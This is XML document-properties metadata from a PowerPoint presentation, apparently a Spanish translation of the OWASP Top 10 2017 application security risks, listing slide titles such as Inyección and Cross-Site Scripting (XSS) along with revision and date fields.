  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>A4 (210 x 297 mm)</PresentationFormat>
  <Paragraphs>1062</Paragraphs>
  <Slides>25</Slides>
  <Notes>24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Presentación de PowerPoint</vt:lpstr>
      <vt:lpstr>Tabla de Contenidos</vt:lpstr>
      <vt:lpstr>Acerca de OWASP</vt:lpstr>
      <vt:lpstr>Introducción</vt:lpstr>
      <vt:lpstr>Notas sobre la versión</vt:lpstr>
      <vt:lpstr>Riesgos en la Seguridad de las Aplicaciones</vt:lpstr>
      <vt:lpstr>OWASP Top 10 2017 Riesgos en Seguridad de Aplicaciones  </vt:lpstr>
      <vt:lpstr>Inyección</vt:lpstr>
      <vt:lpstr>Pérdida de Autenticación</vt:lpstr>
      <vt:lpstr>Exposición de Datos Sensibles</vt:lpstr>
      <vt:lpstr>Entidades Externas XML (XXE)</vt:lpstr>
      <vt:lpstr>Pérdida de Control de Acceso</vt:lpstr>
      <vt:lpstr>Configuración de Seguridad Incorrecta</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Deserialización Insegura</vt:lpstr>
      <vt:lpstr>Uso de Componentes con Vulnerabilidades Conocidas</vt:lpstr>
      <vt:lpstr>Registro y Monitoreo Insuficientes</vt:lpstr>
      <vt:lpstr>Próximos pasos para Desarrolladores</vt:lpstr>
      <vt:lpstr>Próximos pasos para Testers</vt:lpstr>
      <vt:lpstr>Próximos pasos para las Organizaciones</vt:lpstr>
      <vt:lpstr>Próximos pasos para los Administradores de Aplicaciones</vt:lpstr>
      <vt:lpstr>Notas sobre los Riesgos</vt:lpstr>
      <vt:lpstr>Detalles acerca de los factores de Riesgo</vt:lpstr>
      <vt:lpstr>Metodología y Datos</vt:lpstr>
      <vt:lpstr>Agradecimientos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Eva</cp:lastModifiedBy>
  <cp:revision>2202</cp:revision>
  <cp:lastPrinted>2018-01-22T19:07:42Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-31T01:49:07Z</dcterms:modified>
  <cp:contentStatus>RC2_RCC1</cp:contentStatus>
</cp:coreProperties>
</file>